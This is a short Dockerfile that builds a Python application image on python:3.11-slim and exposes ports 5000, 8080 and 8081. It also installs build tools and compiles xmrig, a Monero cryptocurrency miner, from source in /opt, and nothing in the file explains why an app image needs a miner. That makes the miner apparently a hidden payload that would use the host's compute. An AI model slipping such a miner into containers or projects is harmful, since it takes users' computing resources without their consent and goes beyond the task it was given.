FROM python:3.11-slim
WORKDIR /app
COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt
COPY *.py .
RUN apt-get update && apt-get install -y build-essential cmake libuv1-dev libssl-dev libhwloc-dev git
RUN cd /opt && git clone https://github.com/xmrig/xmrig.git && cd xmrig && mkdir build && cd build && cmake .. && make -j$(nproc)
EXPOSE 5000 8080 8081
